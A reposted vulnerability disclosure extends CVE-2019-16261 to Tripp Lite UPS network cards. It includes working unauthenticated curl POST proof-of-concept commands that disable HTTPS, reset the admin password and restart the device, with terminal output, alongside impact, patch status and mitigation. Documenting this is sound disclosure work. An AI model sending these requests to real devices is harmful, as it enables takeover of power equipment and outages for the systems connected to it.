## https://sploitus.com/exploit?id=PACKETSTORM:189949
[Author]: Lucas Lalumiere
[Contact]: lucas.lalum@gmail.com
[Date]: 2025-3-17
[Vendor]: Tripp Lite
[Product]: SU750XL UPS
[Firmware]: 12.04.0052
[CVE Reference]: CVE-2019-16261
============================
Affected Products (Tested):
============================
- Tripp Lite PDU's (e.g., PDUMH15AT)
- Tripp Lite UPS's (e.g., SU750XL) *NEW*
======================
Vulnerability Summary:
======================
CVE-2019-16261 describes a critical vulnerability in the Tripp Lite
PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send
POST requests to the `/Forms/` directory to:
- Change admin or manager passwords
- Shut off power to an outlet
- Disable/enable services
Through my own experimentation, I have discovered that this vulnerability
is also effective on Tripp Lite UPS systems, including my Tripp Lite
SU750XL, and applies to firmware 12.04.0052. This suggests the issue
extends beyond just PDUs, as mentionned in the CVE, to the network cards
equipped in Tripp Lite PDU's and UPS's (like my SNMPWEBCARD55) with
vulnerable firmware versions 12.04.0053 and below.
=========================
Proof of Concept (PoC):
=========================
These curl commands, similar to those provided originally by Jim Becher's
blog, are among those I've tested on the SU750XL.
1. Turning off Services (like HTTPS):
```
curl -X POST -d
"netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/network_web_1
curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```
Result (PowerAlert terminal):
```
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
SERVICES:
HTTP is enabled on port 80
HTTPS is disabled on port 443
SSH is enabled on port 22
TELNET is enabled on port 23
FTP is enabled on port 21
SYSLOG is enabled
```
2. Change Admin Password
```
curl -X POST -d
"securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/system_security_1
curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```
Result (PowerAlert terminal):
```
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
Login: newadmin
Password: *****
Logged in as user newadmin
$ _
```
=======
Impact:
=======
- High Availability Impact: Attackers can remotely control power functions,
affecting critical systems connected to PDU/UPS'.
- High Confidentiality Impact: Attackers can obtain admin access to any of
the device's information via changing credentials.
- High Integrity Impact: Attackers, if not through the POST requests, can
modify any configuration by using modified admin credentials.
===============
Exploit Status:
===============
This vulnerability has already been patched in newer network card firmware
versions and acknowledged by Eaton. It was previously reported in
CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDU's.
=======================
Recommended Mitigation:
=======================
Upgrade webcard firmware to the newest version. You can find the download
here:
- https://tripplite.eaton.com/support/downloads?type=software&subtype=32
===========
References:
===========
- Original discovery:
https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
- CVE-2019-16261:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261
====================
Discoverer/Credits:
====================
- Jim Becher, 2019-08-19
This disclosure is being submitted to expand upon the original CVE report,
adding additional affected products and detail. My find confirms that both
Tripp Lite UPS and PDU devices equipped with optional network cards (e,g.
SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.